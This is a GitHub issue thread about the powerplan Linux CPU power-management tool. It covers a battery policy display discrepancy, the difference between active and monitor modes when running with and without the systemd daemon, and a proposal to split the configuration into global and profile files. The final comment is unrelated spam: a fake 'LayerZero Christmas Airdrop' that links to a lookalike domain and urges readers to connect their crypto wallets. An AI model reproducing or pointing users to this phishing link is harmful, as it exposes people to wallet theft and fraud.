### ISSUE TITLE
powerplan -s shows a different battery policy than what's set in powerplan.conf

### ISSUE THREAD

**Issue by kalzEOS** [Haptein/powerplan#6]
**Description**
In the output of `sudo powerplan -s`, it was showing the policy as balance_power no matter what I did in the `powerplan.conf` file.
I think it started happening after I ran `powerplan --persistent`, then it corrected itself after a couple of reboots. Now it is showing the correct thing. I still want to know why it did that at first.
**Additional info:**
Please include the output of "powerplan --system" and your powerplan.conf file (if relevant to issue)
```
System
    OS:                 Linux-5.14.10-1-MANJARO-x86_64-with-glibc2.33
    powerplan:          0.8.5 running on Python3.9.7 with psutil5.8.0
    CPU model:          Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz
    Core configuraton:  4/8  0-4 1-5 2-6 3-7
    Frequency range:    400000 - 1800000 - 4000000
    Driver:             intel_pstate
    Turbo:              /sys/devices/system/cpu/intel_pstate/no_turbo
    Governors:          performance, powersave
    Policies:           default, performance, balance_performance, balance_power, power
    Temperature:        acpitz, pch_skylake, iwlwifi_1, *coretemp
    AC adapter:         AC
    Battery:            BAT0
```
`powerplan.conf`:
```
[DEFAULT]
priority = 99
ac_pollingperiod = 1000
bat_pollingperiod = 2000
ac_cores_online = 4
bat_cores_online = 4
ac_templimit = 95
bat_templimit = 95
ac_minfreq = 400
ac_maxfreq = 4000
bat_minfreq = 400
bat_maxfreq = 3000
ac_minperf = 1
ac_maxperf = 100
bat_minperf = 1
bat_maxperf = 96
ac_tdp_sustained = 30
ac_tdp_burst = 45
bat_tdp_sustained = 10
bat_tdp_burst = 16
ac_turbo = True
bat_turbo = False
ac_governor = powersave
bat_governor = powersave
ac_policy = balance_performance
bat_policy = power
triggerapps = 
```

![Screenshot_20211025_222719](https://user-images.githubusercontent.com/49320606/138986983-91d09fed-ca64-4948-8edf-ac909452a7a6.png)
.

**Comment by KarkanAlzwayed** [comment]
Do I need to run powerplan as a daemon before I can restart it with `systemctl`?
Because when I rung` sudo systemctl restart powerplan`, I get this error:

`Failed to restart powerplan.service: Unit powerplan.service not found.`
I haven't run `sudo powerplan  --daemon` after installing it, just to be clear.

**Comment by Haptein** [comment]
> Do I need to run powerplan as a daemon before I can restart it with systemctl?
Yes, running ```powerplan --daemon``` installs and enables powerplan as a systemd daemon. If you uninstall powerplan the service naturally get's uninstalled as well.

**Comment by KarkanAlzwayed** [comment]
I'm so confused. So running `--daemon `makes powerplan run across reboots, which means, without it, it should stop when I reboot, but it is not stopping on my machine even after several reboots. Every time I run `sudo powerplan -s`, it shows the active window like normal, and it is working. The only difference I am seeing after running it as a daemon is now `powerplan -s` shows as a monitor mode instead of active. Can you please beat some sense into my brain? lol

**Comment by Haptein** [comment]
Ok, help me get some things clear.
> but it is not stopping on my machine even after several reboots.

What do you mean it's not stopping? Can you see it running on a process monitor?

> Every time I run sudo powerplan -s, it shows the active window like normal, and it is working. 

With active window do you mean the active mode indication?

> The only difference I am seeing after running it as a daemon is now powerplan -s shows as a monitor mode instead of active.

That's to be expected. Since the daemon is already running, if you run powerplan in a terminal window this new instance won't be allowed to make changes to your system (hence the monitor mode).

What I am getting is that somehow the changes are persisting across reboots without the daemon. Is this correct? If this is somehow the case, without an active powerplan process your power profiles won't get automatically switched (with ac power changes or profile-triggering apps running).

**Comment by KarkanAlzwayed** [comment]
>What do you mean it's not stopping? Can you see it running on a process monitor?
>
I mean, after install powerplan for the first time, run sudo powerplan -s, I'd get the [active mode] window in the terminal where I see info about the power draw and all that stuff (see screenshot). If I reboot and run the same powerplan -s, I'd still get the active mode window where I can see the same info. That indicates to me that it ran through reboots. Wouldn't it just throw an error when I run powerplan -s after a reboot if I've never run -daemon? Because it should've stopped after the reboot? Or am I wrong?
>What I am getting is that somehow the changes are persisting across reboots without the daemon. Is this correct?
>
Yes, this is the window that I am talking about. I am seeing this even after a reboot without even running `sudo powerplan -daemon`
![Screenshot_20211030_233557](https://user-images.githubusercontent.com/49320606/139566231-16e7d9f9-6875-46b6-8dd4-786e9ea2cf63.png)

**Comment by Haptein** [comment]
I think I see the misunderstanding now.

Using the --status argument means that in addition to doing it's thing, powerplan will also output some status data. If there's already a process or powerplan running at the time of running powerplan -s in a terminal, then the powerplan process you created in the terminal won't do any system changes, it will just show the status data (and it will therefore show monitor mode at the top). "active/monitor mode" indicates if the current process being run is allowed to do system changes.

>If I reboot and run the same powerplan -s, I'd still get the active mode window where I can see the same info. That indicates to me that it ran through reboots. Wouldn't it just throw an error when I run powerplan -s after a reboot if I've never run -daemon? Because it should've stopped after the reboot? Or am I wrong?

The behaviour you describe is exactly as expected, but that doesn't mean the process maintains it's presence across boots. This happens in the following way:

1. You run ```sudo powerplan -s``` in terminal.
2. No other instance of powerplan is detected so this new process is granted system changing rights (active mode that is)
3. Reboot
4. Repeat steps 1 and 2.

So powerplan never runs at boot time automatically in this scenario, but whenever you run it it runs on active mode.

**Comment by Haptein** [comment]
Ok, so I'd like some feedback on this. I was thinking on introducing a pair of global config variables (persistent and notifications, both off by default). But I worry it'd be a bit confusing if I include all that in the current profile config file (**/etc/powerplan.conf**). The idea is to change that to:
/etc/powerplan/powerplan.conf
/etc/powerplan/profiles.conf

The current /etc/powerplan.conf would just get moved to /etc/powerplan/profiles.conf and new global variables can go in the other file. Does this sound reasonable?

**Comment by monarc99** [comment]
It sounds good. Global config in /etc/powerplan/powerplan.conf

Profiles:  
1 file or several

/etc/powerplan/profiles.conf

or

/etc/powerplan/profiles.d/default.conf
/etc/powerplan/profiles.d/performance.conf
/etc/powerplan/profiles.d/powersave.conf

like the ananicy rules.

**Comment by gqgserver** [comment]
# $1000 Christmas Airdrop for 10,000 Eligible Users! 🎅🎁

Welcome to the festive $1000 Christmas Airdrop by LayerZero! Get ready to unwrap the joy and claim your share of $ZRO tokens. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*SalqMtUhedutBSfrW7-T-A.png)

## Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Christmas Spirit:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Instagram:**
     [Share on Instagram](https://instagram.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&title=LayerZero+Christmas+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero Christmas Airdrop and secure your $ZRO tokens.

Don't miss out on this festive collaboration – claim your Christmas tokens now and let the holiday spirit shine with LayerZero!
